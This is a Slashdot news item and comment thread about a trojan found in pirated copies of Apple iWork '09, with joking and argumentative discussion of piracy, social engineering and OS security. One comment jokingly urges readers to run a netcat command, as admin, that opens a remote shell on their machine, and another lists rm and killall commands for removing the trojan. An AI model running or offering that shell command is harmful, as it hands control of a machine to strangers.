Trojan Hides In Pirated Copies of Apple iWork '09 431
CWmike writes "Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites contain a Trojan horse that hijacks Macs and leaves them open to further attack, a security company said yesterday. The 'iServices.a' Trojan hitchhikes on iWork '09's installer, said Intego, which makes Mac security software. 'The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password,' Intego said in a warning. Once installed, the Trojan "phones home" to a malicious server to notify the hacker that the Mac has been compromised, and to await instructions."
Now unveiling... (Score:5, Funny)
The iPwn!
Re:Now unveiling... (Score:5, Funny)
Re:Now unveiling... (Score:5, Funny)
I'd like to take this opportunity to welcome mac users to the pc world...I mean really....pirated software with a virus...who would have seen that one coming?
I just wish someone would do this for the Linux world. I've tried nearly every ISO download under "Applications -> Unix" on The Pirate Bay, but everything seems to be *legal*.
It won't be the year of Linux on the Desktop(tm) until you can download pirated linux applications from The Pirate Bay complete with virii and rootkits.
Re: (Score:3, Interesting)
Re:Now unveiling... (Score:4, Funny)
no, no, no. Virii in Linux world work on the honor system. You randomly delete a dozen of your files and mail the virus on to everyone in your address book.
OpenSource and Malware (Score:3, Insightful)
I just wish someone would do this for the Linux world. I've tried nearly every ISO download under "Applications -> Unix" on The Pirate Bay, but everything seems to be *legal*.
Why then does OpenOffice.org tell us not to use version which are not from there very own server? Legal does not mean free of malware ad-ons.
The truth is: OpenSource makes is easier to attach malware to a download.
Note that I am all in favour of OpenSource - but one should not close his / her eyes from the downside.
Re:Now unveiling... (Score:5, Funny)
Argh. Please don't say "virii", even ironically. It encourages idiots.
QED
Re:Now unveiling... (Score:4, Funny)
yeah, but viruses sounds like breastuses.
Huh? (Score:3, Funny)
But then how will I describe it when more than one virus infects my boxen?
Re: (Score:3, Interesting)
Stupid Linux.. not letting me run viruses.
Pirates (Score:5, Insightful)
Not to troll, but as far as I'm concerned anyone who pirates software deserves it...
Re: (Score:3, Funny)
And does everyone who purchase a dime bag off the street deserve to have it laced with crack?
Re: (Score:3, Insightful)
Perhaps, but then they will get what's coming to them - they take the risk by getting their software from shady sites.
There's a much higher percentage of Mac users who *do* pay for their software though, so this just won't affect them.
It's only $80 or something for iWork. If you really need it, you can afford to buy it (and don;t give me that "some people are so poor" crap - if you can buy a computer, you can budget for the software to run on it).
Re: (Score:3, Funny)
Re: (Score:3, Funny)
What's the world coming too? I mean if you can't even trust a warez provider...
Re:Now unveiling... (Score:5, Insightful)
Go learn about the difference between a virus and a trojan.
Re:Now unveiling... (Score:5, Funny)
Go explain the difference to a Mac user.
Re:Now unveiling... (Score:4, Insightful)
Is this a virus?
Didn't think so.
This is social engineering at its finest - an untrusted source, launching executable code (via user action) and gaining elevated privileges (via user input of password).
Welcome to any operating system's severe vulnerability to attack.
Still no viruses on OS X though, beyond that proof of concept thing a while back. Still, 1 versus.... how many on Windows? So many you *require* a dedicated third party app to bog down your system and act as doctor, surgeon and nurse to keep the machine clean?
I'll take OS X thanks.
Also, don't steal software. You're just asking for trouble. This isn't the first time that OS X has been targeted with dodgy copies of software from download sites - I seem to remember an app that claimed to be the MS Office for Mac installer that did nothing except delete the contents of your home folder.
Moral of the story again: Untrusted code could do anything. Don't download copied software.
Re: (Score:3, Insightful)
So many you *require* a dedicated third party app
What? Let me fix that for you.
So many you *require* a dedicated third party apps
That's more like it.
Re:Now unveiling... (Score:5, Insightful)
That was exactly my point. It's a trojan that relies on social engineering to defeat system security, and that's not unique to any one operating system, Windows, Mac or even your favourite flavour of Linux if you're in the market of using dodgy packages.
I didn't mention anything about porn or music.
Re:Now unveiling... (Score:4, Insightful)
Not that I condone piracy but (Score:3, Funny)
Re:Not that I condone piracy but (Score:5, Funny)
Then you don't get the trojan from iWorks, but from the keygen that further frustrates you by playing an annoying and loud tune while you go through the serial generating process.
Note to keygen creators: I do not want to hear your brother's crappy techno remixes when using your app. Is there some way I can pay you to disable this feature?
Re:Not that I condone piracy but (Score:5, Informative)
Not that I'd ever use a keygen or anything, but that's definitely only a Windows problem. From what I *cough* hear, most apps are either pre-cracked, have a drag-and-drop crack (how Mac-like), or just need any of a hundred serials floating around with no further mess.
(Actually, I think all of my software is totally legit except for Photoshop, and I plan to buy it eventually)
Re:Not that I condone piracy but (Score:5, Funny)
(Actually, I think all of my software is totally legit except for Photoshop, and I plan to buy it eventually)
We all plan to buy Photoshop.
Re: (Score:3, Insightful)
I don't. And I don't plan on pirating it, either. Perhaps you high-powered graphics designers need the full-blown Photoshop, but I'm fine with GIMP.
(No, I don't want to start a GIMP-vs-Photoshop flame war. I fully realise that some people won't accept GIMP as a substitute, either because they've already paid for and learned Photoshop or because they're one of the rare people – graphics designers or what-have-you – who needs certain features that GIMP doesn't support. I'm just pointing out that p
Re: (Score:3, Interesting)
Me neither.
Particularly knowing that my former boss and his competition still run only pirated software on all of their computers. .DLLs... no two computers being able to run the same app cause it's serial was already being used somewhere else on the network.
Being lazy bastards - most Mac pirating was done by just copying the entire folder of the particular app.
No registry, no shared
Re:Not that I condone piracy but (Score:5, Insightful)
Note to keygen creators: I do not want to hear your brother's crappy techno remixes when using your app. Is there some way I can pay you to disable this feature?
Erm, you can indeed. You can pay money to buy a legit serial number - voila - no crappy techno music.
-Em
Re:Not that I condone piracy but (Score:5, Funny)
Then you don't get the trojan from iWorks, but from the keygen that further frustrates you by playing an annoying and loud tune while you go through the serial generating process.
Note to keygen creators: I do not want to hear your brother's crappy techno remixes when using your app. Is there some way I can pay you to disable this feature?
Send your money to me, and I'll reply with instructions on how to "mute" undesired sounds you find coming out of your computer. Never be forced to listen to crappy music again!
Re:Not that I condone piracy but (Score:5, Funny)
Will I be able to listen to my mp3s while using the keygen?
Re:Not that I condone piracy but (Score:5, Informative)
Apple removed serial number requirements from iWork '09 - just install for the CD and go.
Now, explain again how to use a sn with a crippled trail, please...
Re:Not that I condone piracy but (Score:5, Funny)
Of course (Score:5, Insightful)
Re:Of course (Score:5, Interesting)
LittleSnitch [obdev.at] is one of my favorite security programs. Shows any outgoing connections and I can allow for that session, once, or forever and to just that port, any port, that host, that host and port.
Does anyone have a torrent to a file with the trojan? I'd like to open the .pkg and and look at it. It's surprisingly easy to look at the 'install' files. Right click on the pkg and open a few folders and look for pre-flight & post-flight scripts (which can be written in about any language). .pkgs are fun little things.
Re:Of course (Score:4, Insightful)
It's especially nice if such monitoring software is not "on the radar" of malware sites, since they could include a workaround for such software, as is frequently done for Norton and Symantic on Windows.
Re: (Score:3, Informative)
I can confirmed LittleSnitch works like a charm.
The site above doesn't provide free download, so I went to an abundantware site called ThePirateBay.org.
I'm surprised this little germ even comes with pre-whitelist feature and several connections that I've never heard of have already been pre-allowed.
Truly a time-saver.
Re:Of course (Score:5, Insightful)
You got two fingers [macosxhints.com]? (If not, sorry, I'm an insensitive clod.)
Re: (Score:2)
cynicism (Score:5, Insightful)
Sometimes I wonder if companies that create security software aren't sometimes guilty of either creating or funding the creation of viruses, trojans, worms, &c. simply to justify their own existence.
Is that cynical?
Re:cynicism (Score:5, Insightful)
They certainly use virus news to justify their existence and the cost of their products. The fact that they exist is tantamount to admitting that no OS can be fully secured.
The harder anti-virus vendors bleat on about how good their product is, the more bragging rights a virus writer will get for walking around the security... among their own crowd. It's more or less a case of putting up a wall and telling the world, there, you can't get past this wall now.
The real trouble with anti-virus vendors is that they tend to convince people that once their product is installed, the end user's pc is safe. It is NOT, and won't ever be. Some of the best virus programs in the world are still out in the wild, running as they were intended to run, collecting and passing information as they are supposed to. Since they are not destructive to normal computer activity, they go undetected. Don't say that such does not exist... I know you have not done forensics on all existent computers. Every now and then we hear about some corporate espionage or attacks from state military groups etc. All of this is just hinting at the real problems: The virus programs we don't know about.
Think about it. If a virus program did some key logging for bank URLs then spread itself a bit, then self destructed... hmmmmm They are seeing more sophisticated virus programs now, and fortunately beginning to look for them. Sadly, you'll have some pretty incredibly long scan times to find some types of malicious software: none of this 45 minute scan by Symantec etc.
Soon, you'll need a multicore CPU just to handle real time scanning. It's a giant whack-a-mole game. Always will be.
Re: (Score:2, Informative)
Think about it. If a virus program did some key logging for bank URLs then spread itself a bit, then self destructed... hmmmmm They are seeing more sophisticated virus programs now, and fortunately beginning to look for them. Sadly, you'll have some pretty incredibly long scan times to find some types of malicious software: none of this 45 minute scan by Symantec etc.
Presumably you mean worm programs not virus programs. Virus programs are typically very obvious as they modify the executables on the system they infect. These modifications are easily detected as the checksums (md5, crc, whatever) change and someone notices.
Re:cynicism (Score:5, Interesting)
Actually, IMO we are in need of another category of malicious software. Social engineering allows code writers to get their code run by the user in a way that is neither stealthy or without their knowledge. It runs as a user program, and did not necessarily 'infect' the machine, yet is a virus by the definition that it has modified an executable. So we need either a new term, or be satisfied that the generic use of the term 'virus' fits such code.
An example would be a screen saver that does it's work when the computer is idle and the screen saver itself has been run on the user's command to do so. That group of software that claims to be scanning software which does more than look for malicious code is also in this category. It's becoming quite confusing, and at any turn unvalidated code can be malicious. Many end users are unable to know the difference without much more training. Social engineering makes it fairly simple to get users to run malicious code.
We've seen people repackage OOo software and sell it. It won't be long before we discover such tactics used to deliver malicious code. Would that be a virus or a worm?
You see, my favorite scenario for malicious code is quite simple... spreads like a virus, then sits and waits patiently for the moment that it finds itself on a machine whose user is 'bill gates' (as an example) then every time the screen saver is activated, it searches the drive for the oldest .xls or .doc files and deletes two of them that are at least 45 days since last access. Every 17th time (or follow a Fibonacci number sequence) the screen saver is activated, it searches for Symantec installations and deletes the current virus definition file. Every 6th boot, it loads a key logger which looks for a select set of certain bank URLs. Every time you plug in a USB drive, it copies itself to the USB device if the screen saver is activated. You see, there are many ways to create hard to find problems. It won't be long before we are seeing them.
Re: (Score:2)
As long as there are crackers without girlfriends in the world, they don't need to.
But to fuel your paranoia, maybe *that*'s why they sometimes used to offer jobs to prominent crackers;)
New anti-virus company (Score:5, Funny)
As long as there are crackers without girlfriends in the world, they don't need to.
I propose starting a new anti-virus company that will focus on dates for crackers rather than OS security.
Re: (Score:3, Funny)
Re: (Score:2)
No, I've thought that for a long time. But I showed them, I simply downloaded a cracked version of their antivirus software! Sure, my computer promptly stopped working, but I'm sure that would have happened anyway. Correlation is not causation.
Re: (Score:2)
Is that cynical?
Actually, it's called Critical or Analytical thinking [wikipedia.org]...
;).
Cynicism is a negative perception of something that doesn't neccessairily involve evaluation of the topic in the larger context, something like:
"There is no good left in the world, people will never change, and I might as well become evil too!".
^^^^That's some pretty bad cynicism (or pessimism) though, hopefully most people don't ever get that cynical
It's all Apple fault (Score:5, Funny)
If only Apple hadn't stripped out the DRM this would have never happened!
No, that's impossible. (Score:2, Funny)
Comment removed (Score:5, Insightful)
Re:No, that's impossible. (Score:4, Interesting)
Re:No, that's impossible. (Score:5, Insightful)
Just this week. [nytimes.com]
A worm differs from a virus only in so much that it doesn't need to copy itself into a system program. For all intents and purposes however, the difference between the two terms is antiquated.
Re: (Score:2)
Re: (Score:2)
Yes. Worms. Nobody ever hears about a trojan attacking Windows. It's simply not news.* Worms are the really evil ones, because they spread with no intervention, over the network, meaning they can infect a huge number of machines very quickly.
Re: (Score:2, Funny)
And how long has it been since a true virus was attacking windows?
Every single day. Truly. They do that in building construction and renovation all the time.
("You move to an area and you multiply and multiply ... There is another organism on this planet that follows the same pattern. Do you know what it is? A virus.")
It's always trojans, worms or adware and has been for several years.
I don't think big wooden horses can fit through a window, although little crawling worms and poster advertisements can.
Re: (Score:2)
And how long has it been since a true virus was attacking windows? It's always trojans, worms or adware and has been for several years.
Well, let's just say that we're reaching a point where it's easier to take advantage of users than it is to take advantage of code. Well, really, it has nothing to do with code, it's more just really really easy to make users look stupid. Example: Antivirus2009.exe
Re: (Score:2)
No system EVER will be secure from a trojan, since for a trojan to work the USER has to willingly give his admini password to install it.
I disagree. Systems can be and have been designed to make getting a trojan running and useful a very, very difficult feat of social engineering or even impossible without hacking the machine in advance. Right now these systems are fairly restricted in their deployment and none are mainstream on consumer PCs, but that doesn't mean mainstream OS's can't catch up and both OS X and Linux are working on technologies that can help mitigate trojans.
Re: (Score:2)
It really should be noted... (Score:4, Funny)
That it is the easiest trojan to use ever. Bravo, Apple.
Why is this a story? (Score:2, Insightful)
Re: (Score:2)
Since when does a PEBKAC error count as news?
I take exception to your assertion. Just because a user runs a program does not mean that program should automatically be able to connect to a remote server without their permission or notification. That's the case for almost all current, mainstream OS's but that does not mean it is a good design.
Second, this is news because it is a trojan reportedly in the wild for a platform where there are very few trojans circulating, especially trojans that are not targeting a specific person or company. People want to
Re: (Score:2, Insightful)
The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password
As I said, it's a PEBKAC error. If you give an installer your admnin password it can do whatever it pleases. Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password. No security paradigm will ever be invented that cannot be undermined by human stupidity.
Re: (Score:3, Insightful)
As I said, it's a PEBKAC error. If you give an installer your admnin password it can do whatever it pleases.
And if you read my post, I'm telling you that is a design flaw in the OS. On a well designed OS, the software has more granularity of permission than "can do everything include connect to random servers" and "can't install". Apple seems to agree with me since they added an ACL framework to restrict applications with a finer level of permissions in the last version, although it is only used for a small subset of applications so far.
Only an idiot installs pirated wares and only a supremely stupid idiot gives said warez the root password.
I think installing pirated software is unethical and risky, but not necessari
Re: (Score:2)
And if a user is stupid enough to install a pirated ware AND give said ware the root password, what on earth makes you think they will possibly be able to understand what to do if informed that process xyz is opening a connection?
Some will and some won't, but if you don't give them the option than you can hardly blame them. Users need better choices and need to enter their password less often for normal application installs first, then we can worry about user education to deal with the remaining applications.
Re: (Score:2)
iPhone... consumer appliance.
I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.
Re: (Score:2)
iPhone... consumer appliance. I'd say it's closer to a computer than you might think, and I don't see anything realistic preventing malware entering that platform too.
Software for the iPhone is centrally distributed by Apple and uses a signing framework to check packages (regular OS X has it to but it is largely unused). So how is someone going to post fake software with a trojan in it? If they manage to slip one past Apple's review, as soon as it is found Apple can revoke the signature for all copies deactivating them. Software on the iPhone runs in a sandbox and generally has limited permissions making it hard to root. All of these can be overcome, but it is really rea
Actually (Score:2)
I'm a lot more concerned about the legitimate and semi-legitimate companies that install spyware and malware with their software. At least when this kind of crap goes up on a torrent site, there are 7 posts within an hour or two warning other users that there's malware in the program. Whereas when a Microsoft or Sony sets you up the bomb they spend months denying there's a problem first. That still doesn't excuse the lazy user who installs whatever without checking it out first, but I don't think it's ac
If Apple were evil... (Score:3, Insightful)
But... (Score:2, Interesting)
Late last year, in fact, when Apple revised an online recommendation that Mac users consider running antivirus software, the move drew lots of attention.
Most antivirus programs on os x actually scan for Windows viruses only, and are totally useless against almost all os x malware. The only software vendor that I know of that makes anti-malware programs for native OS X malware is Intego. Intego make great software and are mentioned in this article, but what about all the mac users out there who get a mac virus scanner that only scans for windows viruses? A lot of people are being duped.
Obviously, it's a secret SDK (Score:2)
Get a Mac, duh. (Score:2, Funny)
I am surprised we don't hear this more often (Score:2)
I always thought that torrents seem an ideal mechanism to spread viruses. If this becomes epidemic it could very well totally cripple the P2P community.
With pirated software this risk can be mitigated if you have a verified trustworthy hash code of the untempered original version. On the other hand if there is an exploitable vulnerability in a popular codec movie torrents could become a massive security problem (obviously not for enterprise computing but the already more vulnerable home user).
Why not download directly from Apple? (Score:5, Informative)
Re:Why not download directly from Apple? (Score:4, Interesting)
How is this news? (Score:2, Insightful)
Software programs downloaded from third-party pirate sites can contain trojans.
Film at 11!
It's not like trojans are unusual, they are commonplace, and a risk for every computer user who thinks about running things from untrusted sources.
Linux/Mac OS X trojan spreading through slashdot (Score:2)
Please execute the following as admin, type your password as requested:
sudo nc -l -p1234 -d -e bash-L
on windows:
nc -l -p1234 -d -e cmd.exe -L
Oh noes, I ownz yoo box now.
(similar things can be done with reverse ssh tunneling but you get the point)
whew... thank gawd... (Score:4, Funny)
Im running windows...
Re: But, but.... (Score:4, Insightful)
This requires user action and piracy. No one can -ever- claim that -any- computer is safe from, essentially, social engineering.
Re: But, but.... (Score:5, Insightful)
This requires user action and piracy.
So does 99.99% of windows malware.
No one can -ever- claim that -any- computer is safe from, essentially, social engineering.
Again right. But what's the solution? That is the real question.
Because this is the ecosystem microsoft lives in, we've seen what they're trying... digital signatures on drivers, the inability to put admin items in your startup, UAC prompts... etc, etc.
What is Apple going to do in response to inevitable arrival of social-engineering malware as it gains marketshare?
What is Linux going to if/when it acheives enough marketshare among joe-sixpacks for social engineering to be profitable?
As much as /. likes to take shots at Microsoft, what would you do better? *nix security is just as vulnerable to social engineering as windows is, given the same users.
Re: But, but.... (Score:5, Interesting)
Um most pirated software is clean of malware. The primary vectors are email and infected websites (often reputable ones that are compromised themselves, often due to sketchy)
The "piracy has VIRUSES!" myth is very much a content industry creation. I'm more concerned about malware in "genuine" software than pirated, and one more reason that I pirate things when I do. Of course, you -are- running an executable from a total stranger. At least "genuine" software makers have it tied to their name, so this could easily become truer.
Given that all three OSes have sudo, social engineering will ALWAYS work. Unless we take sudo away from average users (which is far easier to get away with on linux than windows and still have everything work smoothly)
If you're really paranoid, you might consider running your browser and mail client in a virtual machine
Re: But, but.... (Score:5, Interesting)
Well, if as few as 10% of the pirated software has viruses, then anyone who downloads and installs 10 software apps has roughly a 66% chance of getting something. It seems bizarre that malware creators wouldn't use pirated software to spread keyloggers and other nasty stuff. I mean - if I went to a website and got a popup to download and install an exe, or I got something in my email that said to run an exe, I'd NEVER do it. And neither would most tech-savy people. But, people who pirate software are installing the software they're downloading. That's a malware-creator's dream come true. I'm sure mafia and identity-theft criminals love the idea (and they can create lots of seeders to create the illusion of being legit).
The "piracy has VIRUSES!" myth is very much a content industry creation.
Uh huh. And the ""piracy has viruses" is a myth" myth is advocated by people who want to believe piracy is totally safe.
I'm more concerned about malware in "genuine" software than pirated, and one more reason that I pirate things when I do.
Well, pirated software has the "malware" created by the genuine software manufacturers plus the malware added to it by anyone who wants to add a trojan.
Re: (Score:3, Funny)
The primary vectors are email and infected websites (often reputable ones that are compromised themselves, often due to sketchy)
A-ha! I knew that there was one mastermind behind all of this. Now we only have to catch sketchy!
Re: (Score:3, Insightful)
I'm part of teh evil content industry. If one of my games wrecks your PC, you can sue me. You can track me down easily from my registered company name and bring court proceedings for damages.
Now try doing that to an anonymous cracker from eastern Europe.
The fact that I know I am legally responsible for the software I sell means I make damn sure there is nothing dodgy in it. This is the opposite incentive for pirates.
An example might be the cracked copy of Democracy 2. It crashes when you win the election ap
Re: (Score:2, Informative)
The biggest w32 virus right now only requires the user to click on what appears to be the normal choice for safe viewing of USB key contents, but other USB trojans don't even need that much. Most of the other forms of malware are installed via drive-by download or by worm propogation. I doubt 99.99% of malware needs user action, or worms, USB Trojans, and drive bys wouldn't be so dangerously prevalent.
I guess you could call "visiting a website" or "plugging in a USB key" user user action, but there's no act
Re: (Score:3, Insightful)
So does 99.99% of windows malware.
Somehow I doubt that Windows worms and exploits only make up .001% of all Windows malware. The old lsass exploit (yeah, I know you remember) was pretty widespread and only required an internet connection and an unpatched Windows 2000/maybe XP machine. ...But it was only a part of the .001% of non-user interactive malware that your statistics seem to assert.
Re: (Score:2)
only make up .001%
Man, what am I? A buggy old pentium? Should have been .01%, my bad.
Re: (Score:2)
>So does 99.99% of windows malware.
If you are going to make up false statistics, at least make them BELIEVABLE.
Besides accusing 99% of the population who are hit by malware of being thieves and you are likely to know what you are saying is untrue. malware-on-USB-drives and picture frames, browser hijacking...
Re: (Score:2)
Now, maybe antivirus software wouldn't have caught this particular virus, but to tell people not to protect themselves is just stupid. People will ALWAYS download virii, they're just that stupid. Apple should encourage
Re: But, but.... (Score:4, Insightful)
You can safely say that, out of the box, Apple's OS is safer than Microsoft's (and you can make up your own reasons why), and this particular "virus" (it's a trojan, not a virus) isn't related to a vulnerability in the OS. It's related to a vulnerability in a trusting user. It's vastly different than an exploit that antivirus programs are designed to watch for. No antivirus would protect someone from this, unless it was known already as a trojan (then an update would have to show up, etc.) But you begin to see the fallacy of blaming Apple for social engineering. Educating the novices of ANY OS is something we should be doing, rather than trying to have a pissing contest between Jobs and Ballmer.
Re: (Score:2)
Macs are much more difficult to infect with a worm or virus, neither of which has to ask the user to do something.
ANY (usable) system is vulnerable to trojans, no matter how well designed.
Re:Not a vulnerability (Score:5, Insightful)
You must be new here. (Score:2)
Micro$oft is the whipping boy.
Granted they make it easy (to install malware and whip them.)
Re: (Score:2)
When malicious nasties get onto OS X by any of the above with no real action on the user's part, then you we can all blame Apple just like we blamed Microsoft. Until then, it's just a PEBKAC issue.
While I agree that this is a PEBKAC issue, perhaps Apple (and MS & Ubuntu too for that matter) should consider including a firewall that monitors outbound traffic by default.
Companies should accept that the user is stupid & try to mitigate their behavior.
Re: (Score:2)
Re: (Score:3)
Re: (Score:2)
Re: (Score:2)
It's easier to just download the trial version and look for the serial number.
Though you're likely to get faster download times through bittorrent with a popular package like this.
Re: (Score:3, Informative)
Have you downloaded something using Apple's servers? I get a solid 1MB/s+ almost all the time, pretty much maxing out my entire connection. It's very rare for me to get anywhere near that on ANY torrent, even very popular ones - plus Apple doesn't ask me to upload the same amount for proper etiquette.
Re:Nice of them to tell you how to remove it. (Score:5, Informative)
Their alert, unlike every other antivirus company alert, does not tell you how to remove the trojan.
Nice.
sudo -s (enter password) /System/Library/StartupItems/iWorkServices
/private/tmp/.iWorkServices
/usr/bin/iWorkServices
/Library/Receipts/iWorkServices.pkg
rm -r
rm
rm
rm -r
killall -9 iWorkServices
Mod parent up. removal instructions. (Score:3, Informative)
Mod parent informative.